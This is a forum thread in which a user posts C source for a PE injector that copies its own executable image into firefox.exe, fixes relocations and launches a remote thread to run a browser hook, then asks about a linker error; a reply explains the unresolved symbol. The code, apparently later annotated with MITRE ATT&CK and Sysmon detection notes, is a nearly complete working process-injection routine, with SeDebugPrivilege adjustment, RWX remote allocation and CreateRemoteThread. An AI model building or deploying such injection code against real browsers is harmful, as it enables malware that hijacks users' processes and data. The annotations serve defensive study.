Hannock Posted May 19, 2017 Report Posted May 19, 2017
So Good Morning, I Coded a PE Injector last time, after several hicks however i managed to get it to work. Now i have managed to make a C Program, nw i want to make use of another C++ program inside a C PE injector , unfortunately i get this kind of Error
Quote
1>------ Build started: Project: mssecure, Configuration: Debug Win32 ------
1> main.c
1> FFInject.c
1>c:\users\XXXXXXXX\documents\visual studio 2013\projects\mssecure\mssecure\ffinject.c(20): warning C4101: 'dwSize' : unreferenced local variable
1> Generating Code...
1>FFInject.obj : error LNK2019: unresolved external symbol "void __cdecl setFFHook(void)" (?setFFHook@@YAXXZ) referenced in function "unsigned long __stdcall ThreadProcFF(void)" (?ThreadProcFF@@YGKXZ)
1>C:\Users\XXXXXXXX\Documents\Visual Studio 2013\Projects\mssecure\Debug\mssecure.exe : fatal error LNK1120: 1 unresolved externals
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========
Source code Looks like this

/*
 * Reviewer annotation: this listing copies the running executable's own
 * mapped image into firefox.exe and starts a remote thread at its copy of
 * ThreadProcFF. That is the pattern MITRE ATT&CK catalogues as T1055.002
 * (Process Injection: Portable Executable Injection). The comments below
 * describe what each step does and the artefact it leaves for a defender.
 */
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#include <tlhelp32.h>
#include <string.h>
#include "FFInject.h"
#include "request.h"
#include "FFhook.h"

/*
 * Entry point of the thread that InjectFF creates in the target process.
 * It only calls setFFHook(), whose definition is not on this page
 * (presumably declared in FFhook.h). setFFHook is the symbol that the
 * LNK2019 error in the build log reports as unresolved.
 */
DWORD WINAPI ThreadProcFF()
{
    setFFHook();
    return 0;
}

/*
 * Enables or removes SeDebugPrivilege (SE_DEBUG_NAME) on the current
 * process token.
 *
 * State: non-zero requests SE_PRIVILEGE_ENABLED; zero requests
 *        SE_PRIVILEGE_REMOVED, which per the Win32 documentation removes
 *        the privilege from the token rather than merely disabling it.
 * Returns FALSE if the token cannot be opened; otherwise the result of the
 * final CloseHandle, not the result of AdjustTokenPrivileges.
 *
 * Nothing in the code shown on this page calls this function.
 * Detection note: a process adjusting SeDebugPrivilege on its own token
 * shortly before opening another process is a signal worth correlating.
 *
 * NOTE(review): dwSize is never used (warning C4101 in the build log).
 * NOTE(review): when LookupPrivilegeValue or AdjustTokenPrivileges fails,
 * the token handle is closed but execution continues, so the same handle
 * is used and closed again further down.
 */
BOOL SetDebugPriviledge(BOOL State)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    DWORD dwSize;

    ZeroMemory(&tp, sizeof(tp));
    tp.PrivilegeCount = 1;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {
        return FALSE;
    }

    // Resolve the LUID of SeDebugPrivilege on the local system.
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) {
        CloseHandle(hToken);
    }

    if (State) {
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    } else {
        tp.Privileges[0].Attributes = SE_PRIVILEGE_REMOVED;
    }

    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) {
        CloseHandle(hToken);
    }

    return CloseHandle(hToken);
}

/*
 * Returns the process ID of the first process in a Toolhelp snapshot whose
 * executable name equals ProcessName, compared case-insensitively with
 * lstrcmpi. Returns 0 when no process matches.
 *
 * NOTE(review): the snapshot handle is not compared with
 * INVALID_HANDLE_VALUE before it is used.
 */
DWORD MyGetProcessId(LPCTSTR ProcessName)
{
    PROCESSENTRY32 pt;
    HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    pt.dwSize = sizeof(PROCESSENTRY32);   // must be set before Process32First
    if (Process32First(hsnap, &pt)) {
        do {
            if (!lstrcmpi(pt.szExeFile, ProcessName)) {
                CloseHandle(hsnap);
                return pt.th32ProcessID;
            }
        } while (Process32Next(hsnap, &pt));
    }
    CloseHandle(hsnap);
    return 0;
}

/*
 * Copies this executable's in-memory image into firefox.exe, applies base
 * relocations for the remote address, and runs ThreadProcFF there in a new
 * remote thread. Takes no arguments and returns nothing; errors are only
 * printed.
 *
 * NOTE(review): every failure branch prints a message but does not return
 * (the return statements are commented out), so the following calls run
 * with a handle or allocation that is NULL or already released. pid is
 * also passed to OpenProcess without checking for the 0 "not found" value.
 */
void InjectFF()
{
    DWORD pid = MyGetProcessId(TEXT("firefox.exe"));
    PIMAGE_DOS_HEADER pIDH;
    PIMAGE_NT_HEADERS pINH;
    PIMAGE_BASE_RELOCATION pIBR;
    HANDLE hProcess, hThread;
    PUSHORT TypeOffset;
    PVOID ImageBase, Buffer, mem;
    ULONG i, Count, Delta, *p;

    // Cross-process open asking for thread-creation and memory read/write/
    // operation rights. Sysmon Event ID 10 (ProcessAccess) records this open
    // together with the granted access mask.
    hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid);
    if (!hProcess) {
        printf("\nError: Unable to open target process (%u)\n", GetLastError());
        //return -1;
        //getchar();
    }

    // Base address of the calling executable; its PE headers give SizeOfImage.
    ImageBase = GetModuleHandle(NULL);
    pIDH = (PIMAGE_DOS_HEADER)ImageBase;
    pINH = (PIMAGE_NT_HEADERS)((PUCHAR)ImageBase + pIDH->e_lfanew);

    // Image-sized region in the target, committed as PAGE_EXECUTE_READWRITE.
    // Private memory that is writable and executable, image-sized and not
    // backed by a file is a common memory-scanner indicator.
    mem = VirtualAllocEx(hProcess, NULL, pINH->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!mem) {
        printf("\nError: Unable to allocate memory in target process (%u)\n", GetLastError());
        CloseHandle(hProcess);
        getchar();
        //return 0;
    }

    // Local scratch copy of the mapped image; relocations are applied to
    // this copy, not to the running image.
    Buffer = VirtualAlloc(NULL, pINH->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memcpy(Buffer, ImageBase, pINH->OptionalHeader.SizeOfImage);

    pIBR = (PIMAGE_BASE_RELOCATION)((PUCHAR)Buffer + pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
    // Distance between the remote allocation and the local image base. The
    // casts to ULONG keep only 32 bits; the build log shows a Win32 build.
    Delta = (ULONG)mem - (ULONG)ImageBase;

    // Walk the relocation blocks until one with VirtualAddress 0. For each
    // non-zero entry the low 12 bits are the offset inside the block, and the
    // 32-bit value at that location is shifted by Delta. The relocation type
    // held in the upper bits of the entry is not examined.
    while (pIBR->VirtualAddress) {
        if (pIBR->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION)) {
            Count = (pIBR->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(USHORT);
            TypeOffset = (PUSHORT)(pIBR + 1);
            for (i = 0; i<Count; i++) {
                if (TypeOffset[i]) {
                    p = (PULONG)((PUCHAR)Buffer + pIBR->VirtualAddress + (TypeOffset[i] & 0xFFF));
                    *p += Delta;
                }
            }
        }
        pIBR = (PIMAGE_BASE_RELOCATION)((PUCHAR)pIBR + pIBR->SizeOfBlock);
    }

    // Copy the relocated image into the remote allocation.
    if (!WriteProcessMemory(hProcess, mem, Buffer, pINH->OptionalHeader.SizeOfImage, NULL)) {
        printf("\nError: Unable to write process memory (%u)\n", GetLastError());
        VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        getchar();
        //return -1;
    }
    VirtualFree(Buffer, 0, MEM_RELEASE);

    // Start address is ThreadProcFF's location inside the remote copy.
    // Sysmon Event ID 8 (CreateRemoteThread) records the source and target
    // process and a start address that lies in the private allocation
    // rather than in a loaded module.
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)((PUCHAR)ThreadProcFF + Delta), NULL, 0, NULL);
    if (!hThread) {
        printf("\nError: Unable to create thread in target process (%u)\n", GetLastError());
        VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        //return -1;
        getchar();
    }

    // Block until the remote thread exits, then release the remote
    // allocation and the process handle. hThread itself is never closed.
    WaitForSingleObject(hThread, INFINITE);
    VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE);
    CloseHandle(hProcess);
}

What do i seem to get wrongly here? The code in the Hook (setFFHook) is supposed to show Hello i am inside Firefox
Quote
u0m3 Posted May 19, 2017 Report Posted May 19, 2017 It's a linking error, and the message is quite self-explanatory: ThreadProcFF makes a call to setFFHook, and the linker does not know where to find setFFHook in order to link it. It does not know which library contains it. Quote